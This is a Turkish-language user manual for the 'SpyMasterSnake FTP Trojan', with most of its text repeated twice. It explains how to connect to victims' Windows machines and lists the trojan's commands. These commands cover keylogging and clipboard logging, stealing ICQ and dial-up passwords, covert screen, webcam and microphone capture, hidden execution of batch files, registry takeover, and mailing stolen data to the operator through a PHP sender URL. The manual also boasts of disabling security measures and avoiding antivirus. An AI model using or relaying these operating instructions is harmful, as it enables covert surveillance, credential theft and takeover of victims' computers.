,SpyMasterSnake FTP Trojan (SFT), aslında çok basit bir mantık üzerine hazırlanmış olsada, tam verimle kullanılabilmesi için iyi derecede bilgisayar ve FTP bilgisine sahip kullanıcılara gereksinim duyar.
SFT, başlı başına hem bir Unix işlevli FTP serverı hemde Windows tabanlı (Win9x,WinME,WinXP,WinNT,Win2K) bir Trojandır. SFT'nin esas yapılma nedenleri arasında, Herhangi bir önceden belirlenmiş, hazırlanmış, Client'e ihtiyaç duymadan, Bir Trojan'ın özelliklerini kullanmak ve aynı zamanda bir FTP server'ının dosya transferlerindeki hızından ve gücünden istifade ederek, açıldığı bilgisayarı bir FTP server'ına dönüştürüp, makinede olan biteni, görsel, işitsel ve yazılı olarak, Trojan sahibine yollamaktır.
SFT içinde bir çok işlevi bulundurmaktadır. Bunlardan başlıcaları şunlardır:
Kurbana bağlanmak için Bir FTP Clienti yada Telnet gibi komut işleyecek bir client'e ihtiyacınız var. Hangi tarz FTP programı kullandığınız önemli değil, ancak ben "Pro" versiyonlarını öneriyorum. Özelliklede "Cute FTP Pro". Eğer ki hiçbir FTP programı yoksa, üzülmeyin, MS-DOS komut penceresini açıp FTP yazarakta bu işi yapabilirsiniz
XP Pro makinalarda yolladığınız serverlar için dikkat etmeniz gereken bir husus var. Bazen server'ı yolladığınız anda kurbana bağlanamayabilirsiniz. Bu durumlarda server'a bağlanabilmeniz için kurbanın bilgisayarını yeniden başlatması gerekebilir. Çünkü server, bilgisayardaki tüm güvenlik önlemlerini kapattıktan sonra bilgisayar yeniden başlamaya ihtiyaç duyar. Bu durum sadece sizin bağlanmanızı geciktirir. Ancak server açıldığı anda göreve başlar ve size mail ile tüm gereken kayıtları yollar.
Örneğin Cute FTP Pro ile, server'a bağlanmak için şunlar yapılmalı:
Programı açıp, yeni bir bağlantı ekleyin, FTP Hostname kısmına kurbanın ipsini, Port kısmına ve diğer kısımlara ise ayarladığınız değerleri yazınız. Daha sonra Connect tuşuna basıp, kurbana bağlanınız. Bağlandığınızda karşınıza gelecek olan Remote klasör, HomeDir olacaktır. Diyelim ki kurbanın masaüstünü görmek istiyorsak, FTP Logunun olduğu ekranda sağ tuşa tıklayp, Enter Raw FTP Command'ı ( Yada Commands --> Enter Manual Cmd) seçmeli daha sonra "capture" yazmalısınız. Komut Alındı gibi bir mesaj görürseniz, bu komutunuzun karşıya gittiğini gösterir. ScreenShot alındı gibi bir mesaj da görürseniz, bu masaüstünün görüntüsünün HomeDir Altına "sc.gif" olarak kaydedildiğini göstermektedir. Bu dosyayı almak için, remote folder'ı ******* yapın ve dosyayı download edin.
Eğer ki Kurbana Her windowsta bulunan FTP komutuyla bağlanmak isterseniz:
En önce serverınızın portu 21 olmalıdır. Aksi takdirde FTP komutu kurbanı görmez. Serverınızın portu 21 ise, MS-Dos penceresini açın ve "FTP" yazın. Daha sonra "Open kurbanınIPsi" yazın. Size Username soracaktır, girin ve daha sonra şifre soracaktır, onuda girin. Login olduktan sonra, Remote folder HomeDir olacaktır. Masaüstünün görüntüsünü almak için komut olarak "literal" yazın. Daha sonra çıkan boş alana "capture" yazın. Cevap mesajı çıkacaktır. Daha sonra "ls" komutuyla klasörün içeriğini görüntelip "get" komutuyla "sc.gif" gibi bir isimle kaydedilmiş dosyayı alabilirsiniz.
Eğerki CuteFTP yada başka FTP programıyla bağlantı hataları alırsanız "PASV" modu yerine "PORT" modu kullanın. Yada tam tersi. Karşı makinedeki gizli ve sistem dosyalarını görmek için "NLST" Simple Directory Listing yöntemini kullanın. Bir FTP Clienti ile hata alırsanız, başka bir client kullanınız.
Diyelimki Bir internet kafedesiniz, ve antivirüs programları var. Sizinde kurbanınıza bağlanmanız lazım. Normal bir trojanla bir önceden hazırlanmış client'e ihtiyacınız olacaktır, ancak o client'i boyutu hem büyük olacaktır hemde clienti anti-virüs yüklü bilgisayarda açamayacksınız. Ancak SFT için böyle bir durum söz konusu değil. Onun client'ini Microsoft, her Windows ile beraber dağıtıyor
Böylece nerde olursanız olun bir şey download etmeden kurbanınıza bağlanmış olacaksınız.
Aynı şekilde kurbanlarınızın IPsi size IPSENDER.php üzerinden maille gelecektir. Bunun yanında, isterseniz, size şifreleri, yazdıkları, kopyaladıkları ve daha bir çok bilgide gelecektir. Kısacası isterseniz bu programı FTP diye, isterseniz, Trojan diye, İsterseniz Keylogger diye kullanabilirsiniz
Ayrıca içinde bir SMTP clienti olmayıp bu işi bir php dosyası ile yapması, maillerin kaybolmadan size gelmesini sağlayacak ve isterseniz, biraz php kodlama biliyorsanız, kendinize Victim List yapabilir, var olan başka bir trojan'ın (Sub7) Victim Listesini kullanabilirsiniz. Eğer ki php yada Perl ile socks biliyorsanız, verileri icq yada her hangi bir programada yollatabilirsiniz
Yani bir kısıtlama yada kalıp mevcut değildir...
Kurbanlardan gelen bilgileri, onlarca hatta yüzlerce mail adresine dağıtabilir ve belirli bir kurbandan gelen maili belli bir mail hesabına yollayabilirsiniz.
EXECHIDE komutu ile karşı bilgisayarda gizlice bir bat dosyası çalıştırabilirsiniz. Böylece istediğiniz MS-Dos komutuyla istediğinizi yapabilirsiniz. Yada program yazıyorsanız, istediğiniz bir şey için program yazıp gizlice çalıştırabiliriniz...
REGISTRY'e ait komutlarla istediğiniz her türlü ayar ve veriyle oynayabilirsiniz. Her türlü programı takeover yapabilirsiniz.
Kısacası bu program, bilgisayarı bilen bir kullanıcı için, sistemi sonuna kadar açmaktadır. Bu programın yapabilecekleri , sizin bildiklerinizle sınırlıdır. Eğer ki FTP kullanmayı bilmiyorsanız, masaüstünü bile göremezsiniz.
SFT Kullanılması için bilgiye ihtiyaç duyan, profesyonel, komutlarla çalışan bir trojandır. Daha basit bir trojan için SchoolBus TR'ı denemelisiniz. Kullanılması en kolay trojan olduğunu söyleyebilirim. SchoolBus TR, SpyMasterSnake.Org malıdır.
SFT, FTP Komutlarıyla beraber 100'ün üzerinde komut içermektedir. Bu trojan, eğlenceden çok, sistemi ele geçirmek, bilgi sızdırmak amaçlı yapılmıştır.
Trojanın FTP işlevini kapatmak ve sadece bir KeyLogger gibi kullanmak istiyorsanız, Server editörde sağ tıklayıp, "Server Port Açmasın" kısmını işaretleyiniz. Bu sayede server açıldığı makinada sadece Sendlog işlevlerini yerine getirecektir. Unutmayın ki, bu özelliği açtığınız zaman, kapatma şansınız bulunmamaktadır ve server'a "updateserver" yada "remoserver" gibi komutları veremezsiniz....
Bu trojan kendim için hazırladığım bir trojandır. Ama bunu bir proje haline dönüştürdüm. Ve FTP Trojan yanına bir de HTTP Trojan (SpyMasterSnake HTTP Trojan[SHT]) ile bu projedeki kilit Clientsiz kullanım olanağı doruğa çıkaracağım. HTTP Trojan ile kurbanınıza herhangi bir web browser ile bağlanabileceksiniz. Bir web sitesine girmiş gibi, kurbanın bilgisayarını kontrol edebileceksiniz. Kısacası Client=Browser olacak
Böylece SpyMasterSnake.Org'un ilkleri ve farklı olanı yapma geleneği devam etmiş olup, bu piyasada, Türkiye'de, düşünerek birşeyler ürettiğimizi göstermiş olacağım. Slogan aynı, "Var olan zaten vardır; Önemli olan olmayanı yapmaktır"....
RAS
SFT, başlı başına hem bir Unix işlevli FTP serverı hemde Windows tabanlı (Win9x,WinME,WinXP,WinNT,Win2K) bir Trojandır. SFT'nin esas yapılma nedenleri arasında, Herhangi bir önceden belirlenmiş, hazırlanmış, Client'e ihtiyaç duymadan, Bir Trojan'ın özelliklerini kullanmak ve aynı zamanda bir FTP server'ının dosya transferlerindeki hızından ve gücünden istifade ederek, açıldığı bilgisayarı bir FTP server'ına dönüştürüp, makinede olan biteni, görsel, işitsel ve yazılı olarak, Trojan sahibine yollamaktır.
SFT içinde bir çok işlevi bulundurmaktadır. Bunlardan başlıcaları şunlardır:
- Unix Type FTP Server. Her türlü dosya transferi işini en kısa ve kolay yoldan yapabilmektedir. Mesela: Kalınan yerden download'a devam edebilme, kalınan yerden upload'a devam edebilme, aynı anda bir dosyayı parçalayarak alma, aynı anda bir dosyayı parçalayarak upload etme, V.s. gibi.
- Keylogger ve Pano Logger. Bu iki özellik sayesinde, kurbanın yazmış olduğu herşey ve başmış olduğu klavyedeki tuşlar bir dosyada pencere adlarıyla kayıtlı tutulur. Böylece yazılan Email şifreleri, yollanan mailler, yollanan adresler, chat yapılan kişiler, chat yaparken yazılanlar, kısacası kullanıcının yazdığı herşey kayıtlı tutulur. Bununlada kalınmaz, Pano Logger (Clipboardlogger) ile de kullanıcının Kopyaladığı her text bir dosyada tarihleri ve pencereleriyle kayıtlı tutulur. Böylece klayeden girmeyip kopyalayarak yolladığı, yazdığı textlerden de haberiniz olur. Bunlar size maille yollanır.
- ICQ 2003 Şifre , Internet Şifreleleri gibi bilgisayarda tanınan ve gizlenen şifrelerin çalınması.
- Bir trojanın yapabileceği herşey ve daha fazlası! Örneğin MSN çalma gibi özellikler eklemedim, çünkü MSN gibi messengerların bilgileri zaten bilgisayarda saklı oluyor. Bunlar registryde olduğu için, SFT'nin Registry komutlarıyla bir MSN yada başka herhangi bir program rahatlıkla TakeOver yapılabilir. Aynı şey ICQ History ve Şifreleri içinde geçerlidir. Çünkü sonuçta bunların hepsi dosya veya registryde saklanmaktadır.
- Clientsiz kullanım.
- Kurbanınıza, Linux, BeOS, Mac, PS2 gibi diğer işletim sistemi ve Pc ortamlarıylada bağlanabilirsiniz.
Kurbana bağlanmak için Bir FTP Clienti yada Telnet gibi komut işleyecek bir client'e ihtiyacınız var. Hangi tarz FTP programı kullandığınız önemli değil, ancak ben "Pro" versiyonlarını öneriyorum. Özelliklede "Cute FTP Pro". Eğer ki hiçbir FTP programı yoksa, üzülmeyin, MS-DOS komut penceresini açıp FTP yazarakta bu işi yapabilirsiniz
XP Pro makinalarda yolladığınız serverlar için dikkat etmeniz gereken bir husus var. Bazen server'ı yolladığınız anda kurbana bağlanamayabilirsiniz. Bu durumlarda server'a bağlanabilmeniz için kurbanın bilgisayarını yeniden başlatması gerekebilir. Çünkü server, bilgisayardaki tüm güvenlik önlemlerini kapattıktan sonra bilgisayar yeniden başlamaya ihtiyaç duyar. Bu durum sadece sizin bağlanmanızı geciktirir. Ancak server açıldığı anda göreve başlar ve size mail ile tüm gereken kayıtları yollar.
Örneğin Cute FTP Pro ile, server'a bağlanmak için şunlar yapılmalı:
Programı açıp, yeni bir bağlantı ekleyin, FTP Hostname kısmına kurbanın ipsini, Port kısmına ve diğer kısımlara ise ayarladığınız değerleri yazınız. Daha sonra Connect tuşuna basıp, kurbana bağlanınız. Bağlandığınızda karşınıza gelecek olan Remote klasör, HomeDir olacaktır. Diyelim ki kurbanın masaüstünü görmek istiyorsak, FTP Logunun olduğu ekranda sağ tuşa tıklayp, Enter Raw FTP Command'ı ( Yada Commands --> Enter Manual Cmd) seçmeli daha sonra "capture" yazmalısınız. Komut Alındı gibi bir mesaj görürseniz, bu komutunuzun karşıya gittiğini gösterir. ScreenShot alındı gibi bir mesaj da görürseniz, bu masaüstünün görüntüsünün HomeDir Altına "sc.gif" olarak kaydedildiğini göstermektedir. Bu dosyayı almak için, remote folder'ı ******* yapın ve dosyayı download edin.
Eğer ki Kurbana Her windowsta bulunan FTP komutuyla bağlanmak isterseniz:
En önce serverınızın portu 21 olmalıdır. Aksi takdirde FTP komutu kurbanı görmez. Serverınızın portu 21 ise, MS-Dos penceresini açın ve "FTP" yazın. Daha sonra "Open kurbanınIPsi" yazın. Size Username soracaktır, girin ve daha sonra şifre soracaktır, onuda girin. Login olduktan sonra, Remote folder HomeDir olacaktır. Masaüstünün görüntüsünü almak için komut olarak "literal" yazın. Daha sonra çıkan boş alana "capture" yazın. Cevap mesajı çıkacaktır. Daha sonra "ls" komutuyla klasörün içeriğini görüntelip "get" komutuyla "sc.gif" gibi bir isimle kaydedilmiş dosyayı alabilirsiniz.
Eğerki CuteFTP yada başka FTP programıyla bağlantı hataları alırsanız "PASV" modu yerine "PORT" modu kullanın. Yada tam tersi. Karşı makinedeki gizli ve sistem dosyalarını görmek için "NLST" Simple Directory Listing yöntemini kullanın. Bir FTP Clienti ile hata alırsanız, başka bir client kullanınız.
Diyelimki Bir internet kafedesiniz, ve antivirüs programları var. Sizinde kurbanınıza bağlanmanız lazım. Normal bir trojanla bir önceden hazırlanmış client'e ihtiyacınız olacaktır, ancak o client'i boyutu hem büyük olacaktır hemde clienti anti-virüs yüklü bilgisayarda açamayacksınız. Ancak SFT için böyle bir durum söz konusu değil. Onun client'ini Microsoft, her Windows ile beraber dağıtıyor
Aynı şekilde kurbanlarınızın IPsi size IPSENDER.php üzerinden maille gelecektir. Bunun yanında, isterseniz, size şifreleri, yazdıkları, kopyaladıkları ve daha bir çok bilgide gelecektir. Kısacası isterseniz bu programı FTP diye, isterseniz, Trojan diye, İsterseniz Keylogger diye kullanabilirsiniz
Kurbanlardan gelen bilgileri, onlarca hatta yüzlerce mail adresine dağıtabilir ve belirli bir kurbandan gelen maili belli bir mail hesabına yollayabilirsiniz.
EXECHIDE komutu ile karşı bilgisayarda gizlice bir bat dosyası çalıştırabilirsiniz. Böylece istediğiniz MS-Dos komutuyla istediğinizi yapabilirsiniz. Yada program yazıyorsanız, istediğiniz bir şey için program yazıp gizlice çalıştırabiliriniz...
REGISTRY'e ait komutlarla istediğiniz her türlü ayar ve veriyle oynayabilirsiniz. Her türlü programı takeover yapabilirsiniz.
Kısacası bu program, bilgisayarı bilen bir kullanıcı için, sistemi sonuna kadar açmaktadır. Bu programın yapabilecekleri , sizin bildiklerinizle sınırlıdır. Eğer ki FTP kullanmayı bilmiyorsanız, masaüstünü bile göremezsiniz.
SFT Kullanılması için bilgiye ihtiyaç duyan, profesyonel, komutlarla çalışan bir trojandır. Daha basit bir trojan için SchoolBus TR'ı denemelisiniz. Kullanılması en kolay trojan olduğunu söyleyebilirim. SchoolBus TR, SpyMasterSnake.Org malıdır.
SFT, FTP Komutlarıyla beraber 100'ün üzerinde komut içermektedir. Bu trojan, eğlenceden çok, sistemi ele geçirmek, bilgi sızdırmak amaçlı yapılmıştır.
Trojanın FTP işlevini kapatmak ve sadece bir KeyLogger gibi kullanmak istiyorsanız, Server editörde sağ tıklayıp, "Server Port Açmasın" kısmını işaretleyiniz. Bu sayede server açıldığı makinada sadece Sendlog işlevlerini yerine getirecektir. Unutmayın ki, bu özelliği açtığınız zaman, kapatma şansınız bulunmamaktadır ve server'a "updateserver" yada "remoserver" gibi komutları veremezsiniz....
Bu trojan kendim için hazırladığım bir trojandır. Ama bunu bir proje haline dönüştürdüm. Ve FTP Trojan yanına bir de HTTP Trojan (SpyMasterSnake HTTP Trojan[SHT]) ile bu projedeki kilit Clientsiz kullanım olanağı doruğa çıkaracağım. HTTP Trojan ile kurbanınıza herhangi bir web browser ile bağlanabileceksiniz. Bir web sitesine girmiş gibi, kurbanın bilgisayarını kontrol edebileceksiniz. Kısacası Client=Browser olacak
RAS
- Parametresiz çalışır. Bu komut girildiğinde, Dial-Up şifreleri, HomeDir altına "Ras" olarak kaydedilir.
- Parametresiz çalıştırıldığında server ayarlarını FTP Loguna yazar.
- SAVE: Bu parametre ile çalıştırıldığında server ayarlarını HomeDir altında "Servinf" olarak kaydeder.
- Kurbanın bilgisayarını kapatır.
- Sadece Win9x makinelerde çalışır ve bilgisayarda şifre diye kayıtlı tutulmuş olan verileri gösterir. HomeDir altına "Cached" olarak kaydedilir.
- Kurbanın internet explorer çubuğuna yazarak girdiği siteleri registryden alır ve "History.reg" olarak kaydeder.
- Kurban bir yerlere yazı yazarken, bu komutla onun yazdıklarının yanına sizin yazdıklarınızı ekleyebilirsiniz.
- Örnek: "senkeys Selam, Nooluyo Burda??"
- ON: Kurbanın bilgisayarında bir mikrofon takılı ise, mikrofon girişini mixer ayarlarından açarak kayıt yapmaya başlar. Bu esnada OFF komutu girilse kayıt o anlık durur. Devam etmek için ON komutu gerekir.
- OFF: Kayıtı o anlık durdurur.
- SAVE: Kayıtı durmuşsa, HomeDir altına SndCapture.wav olarak Kaydeder. Eğer durmamışsa, durdurup kaydeder.
- ON: Klayve ve mouse'ı kilitler.
- OFF: Kilitlenen Klavye ve mouse'ı tekrar açar.
- Komut girildikten sonra Kasa Speaker'ından (Ses kartına yada hoparlöre ihtiyaç yoktur), en önce Smooth Criminal melodisi çalmaya başlar. Daha sonra ise uzun bir ambulans sireni duyulur. Çalma işlemi bittikten sonra FTP logundan size haber verilir.
- ICQ 2003 ve Lite'ın şifrelerini almanızı sağlar. Lite versiyonda, şifre kaydedilme seçili değilse bile şifreyi alabilirsiniz. ICQ'nun önceki sürümlerindeki şifreleri alamazsınız. Bunun için ICQ klaösründeki *.dat ve *.idx dosyalarını almalısınız ve internette bulunan ICQHR gibi history okuyan yada ICQrInfo gibi şifre okuyan programları kullanabilirsiniz.
- Bu komutla kullanıcıya istediğiniz hata mesajını gösterebilirsiniz.
- Örnek: "senderror İşlemcide Su Bulundu, Windows Batacak!!"
- Kurbanın bilgisayarında bir kamera takılı ise, kamerayı açar ve bir görüntü alıp kapatır. Alınan görüntüyü HomeDir altına Webcam.jpg olarak kaydeder.
- Başlat butonunun üzerinde bulunduğu SystemTray çubuğunu görünmez yapar.
- Başlat butonunun üzerinde bulunduğu SystemTray çubuğunu görünür yapar.
- Kurbanın bilgisayarına internetten bir dosya indirir ve HomeDir Altına "Downloaded.ext" olarak kaydeder. Ne download ederseniz edin bu dosya adı değişmez. Download ettiğiniz şeyin uzantısını ".ext" ile değişitirip kendi bilgisayarınıza download edin.
- Çalışan herhangi bir programı kapatır. Çalışan programları görmek için "Proclist" komutunu kullanabilisiniz.
- Örnek: "kill icq.exe"
- Çalışan programları, görünen program pencerelerini ve görünmeyen program pencerelerini HomeDir altına "Proc" olarak kaydeder.
- Herhangi bir program yada dosyayı, üzerine çift tıklanmış gibi çalıştırır.
- Bir program veya komut, *.bat dosyasını gizli bir şekilde çalıştırır. Kurban çalışan programı görmez. Ancak her *.exe uzantılı program görünmez olarak çalıştırılamaz.
- Server için yapılan deişikliklerin kaydedilmesini sağlayan ve serverı tekrar başlatan komuttur. Bir çok ayarı değiştirdikten sonra bir kere bu komutu girmenizde yeterli olacaktır.
- Kurbanın bilgisayarıyla ilgili bilgileri gösterir. Örneğin, CPU adı, hızı, işletim sistemi gibi... HomeDir altına "Sys" olarak kaydedilir.
- Karşı taraf ile chat yapmanızı sağlar. Kurbanın yazdıkları size FTP logu ile gözükür. Kurban chat ekranını arka plana alamaz, kapatamaz, taşıyamaz. Komutu bir mesajla kullanmanız lazımdır. Her yazacağınızın başına "msj" komutunu yazmalısınız. Aksi takdirde yazdıklarınız komut olarak algılanır.
- Örnek: Siz: "msj selam naber?" Cevap: "250 iidir senden?" Siz: "msj bende iyiyim saol"
- MSJ komutu ile açılan chat penceresini kapatır. Bu pencere sizin bağlantınızın kopması ile de otomatik kapanabilmektedir..
- Kurbanın bilgisayarında bir web sitesi açar. Komutu kullanırken URL başına "http://" koymazsanız komut çalışmayacaktır. Bir FTP sitesini göstermek için "ftp://". Outlook gibi mail programları için "mailto://" koyabilirsiniz.
- Örnek: "webpage http://www.spymastersnake.org" yada "webpage mailto:// [email protected]u mail adresi spam botlara karşı korumalıdır, görebilmek için Javascript açık olmalıdır"
- Kurbanın CD-ROM'unu açar, 5 sn açık bekletir ve daha sonra kapatır. Bu işlem sırasında size FTP logundan bilgi yollanır.
- Kurbanın bilgisayarın ekranının görüntüsünü alır ve HomeDir altına "sc.gif" olarak kaydeder. Bu dosyanın büyüklüğü yaklaşık 23-30 KB kadardır. Görüntü kalitesi iyidir, sadece 256 renktir.
- Komut parametresiz girilince o an için aktif hale gelir.
- ONLINE: Kurban internetteyken saat başı yada sizin ayarladığınız dakika süresince bilgisayar ekranının görüntüsünü alıp kaydeder.
- HOUR: Bilgisayar açık olduğu sürece saat başı bilgisayar ekranının görüntüsü kaydeder.
- SETMINUTE: Saatbaşı yerine, isteğiniz dakika süreince capture işlemi yapılır. Kullanımı: Örneğin 5 dakika için girilece komut "capture setminute+5" dir. Burdaki "+" toplama ile alakalı değildir. Bu şekilde verilen bir komut, bilgisayar ekranının her 5 dakikada bir görüntüsünün alınıp, HomeDir altına kaydedilmesini sağlar.
- OFF: Capture komutunu kapatır. Böylece bilgisayar ekranının görüntüsü bir daha alınmaz.
- Homedir altına kaydetmiş olduğunuz Wave dosyasını çalar. Örneğin Homedir altına "BillieJean.wav" isimli bir dosyayı upload edersek.
- Örnek: "playwav billiejean.wav" komutunu girmek yeterlidir.
- Serverın FTP kullanıcı adını değiştirir.
- Örnek: "setusername gokhanmuh" daha sonra restartserver komutu gerekir.
- Serverın FTP şifresini değiştirir.
- Örnek: "setpassword 123456" daha sonra restartserver komutu gerekir.
- Serverın FTP portunu değiştirir.
- Örnek: "setport 21" daha sonra restartserver komutu gerekir.
- Sender URLyi değiştirmenizi sağlar.
- Örnek: "seturl http://www.sizinsiteniz.com/ipsender.php" daha sonra restartserver komutu gerekir.
- Kurbanın adını değiştirir.
- Örnek: "victim LittleSusie" daha sonra restartserver komutu gerekir.
- Kurbana bağlandığınızda, sizin masaüstünüz olacak olan klasörün yolunu değiştirir.
- Örnek: "sethomedir sfthomedir" daha sonra restartserver komutu gerekir.
- Dikkat: Bütün homedirler Windows klasörü altındadır. Bu yüzden yolu girerken içinde sürücü adı kullanmayınız ve başında yada sonunda "\" işareti bulundurmayınız!!! Örneğin Win98 kurulu bir bilgisayarda HomeDir'i "C:\Windows\System\homedir" gibi bir klasör yapmak için "sethomedir System\homedir" yazmanız gerekmektedir. HomeDir her zaman boş ve sistem klasörü olmayan bir klasör olmalıdır.
- Serverın EXEsinin çalışacağı klasördür. HomeDir Gibi Windows Altındadır. Ve asla HomeDir ile aynı olmamalıdır!!
- Örnek: "setrundir System" daha sonra restartserver komutu gerekir.
- Dikkat: Bütün Rundirler Windows klasörü altındadır. Bu yüzden yolu girerken içinde sürücü adı kullanmayınız ve başında yada sonunda "\" işareti bulundurmayınız!!! Örneğin Win98 kurulu bir bilgisayarda RunDir'i "C:\Windows\System" gibi bir klasör yapmak için "setrundir System" yazmanız gerekmektedir.
- Kurbanın bilgisayarında bir dosyayı aramını sağlar. Dosyayı ararken "*" işarei kullanılmalı veya tam dosya adı girilmelidir. Sonuçlar HomeDir altına Search.txt olarak kaydedilir.
- Örnek: C:\ altındaki klasörlerin birinde DangerousWorldtour1.jpg, DangerousWorldTour2.jpg.... gibi dosyalar bulunsun. Bunların hepsini aramak için: "search C:\+DangerosusWorldTour*.jpg" komutu girilmelidir. Böyledece "*" karakterinden önce eşlenen her dosya bulunur. Mesela DangerousWorldTour36.jpg gibi bir dosyayı bulmak istiyorsak. "search C:\+DangerousWorldTour36.jpg" yazılması lazımdır. Tüm JPG dosyalarını bulmak için "search C:\+*.jpg" yazılmalıdır. İçinde Dangerous kelimesini başında içeren bir dosyayı bulmak için ise "search c:\+dangerous*.*" Burdaki "+" aranacak dosya ile içinde aranacak klasörü ayıran bir karakterdir. Konması zorunludur.
- Registry'e bir Girdi ve değer girmenizi sağlar. Bu değer bir Dize değeridir.
- Örnek: "addreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis+Benim Girdim+Benim Değerim" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtarı altına <Benim Girdim> diye bir dize değeri ve <Benim Değerim> adında bir value atamış olduk. Burda kullanılan "+" işaretlerini aynı şekilde kullanınız.
- Registryden bir değer okumanızı sağlar. Bu değer bir Dize değeridir.
- Örnek: "readreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis+Benim Girdim" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtarı altına <Benim Girdim> değeri okunmuş olur. Eğer Yukardaki örneği denediyseniz, bu <Benim Değerim> sonucu olacaktır. Sonuçlar FTP logunda görünecektir.
- Homedir altında bulunan *.reg uzantılı dosyaları registry'e girer. Komutun çalışması için karşı makinede regedit.exe silinmemiş olması lazım.
- Örnek: "importreg Girdi.reg" Girdi.reg burda HomeDir altındadır.
- Registryden bir anahtarı tüm özellikleriyle ve alt anahtarlarıyla *.reg dosyası haline çevirir ve HomeDir altına Exported.reg olarak atar.
- Örnek: "exportreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtarı altındaki tüm anahtarlar ve girdiler Exported.reg olarak kaydedilir.
- ON: Kaydedilen, şifre, log, cliplog gibi her türlü bilgiyi Sender url üzerinden yollar.
- OFF: Bu özelliği kapatır.
- Komut parametresiz girilince o an için aktif hale gelir.
- ONLINE: Sadece kurban online iken kopyalanan textlerin kaydını tutar. HomeDir altına "ClipLogged" olarak kaydeder.
- ALL: Bilgisayar açıkken kaydı tutar. Sadece Online iken değil.
- OFF: İşlemi kapatır.
- Komut parametresiz girilince o an için keylogger'ı açar.
- ONLINE: Bilgisayar online iken, kurbanın yazdığı herşeyi kaydeder. HomeDir altına "Logged" olarak atar.
- ALL: Sadece onlie iken değil, her zaman işlemi yapar.
- OFF: İşlemi kapatır.
- Kurbanın ekranına bir mesaj yollar.
- Örnek: "sendmsg SelamünAleyküm"
- Parametresiz girilince o oturum için en fazla kaç kullanıcının bağlanacağını gösterir.
- Parametre ile girilince o oturum için maximum kullanıcı sayısını belirler.
- Örnek: "maxclients 20"
- Server'ı yeni bir versiyonuyla değiştirir. Bunun için yeni versiyonu ayarlayıp, HomeDir altına atmalısınız.
- Örnek: "updateserver YeniServer.exe" YeniServer.exe HomeDir altında olmalıdır.
- Eğerki server editör şifresi varsa şu şekilde kullanılmalı.
- Örnek: "updateserver EditörŞifresi+YeniServer.exe" + İşareti Konmak zorundadır.
- Server'ı kaldırır. Eğer ki server'ınıza bir editör şifresi koyduysanız. O şifreyide girmeniz gerekmektedir.
- Örnek: "removeserver" yada "removeserver editörşifresi"
- HomeDir altına "Help.html" olarak, bu yardım dosyasını kaydeder..
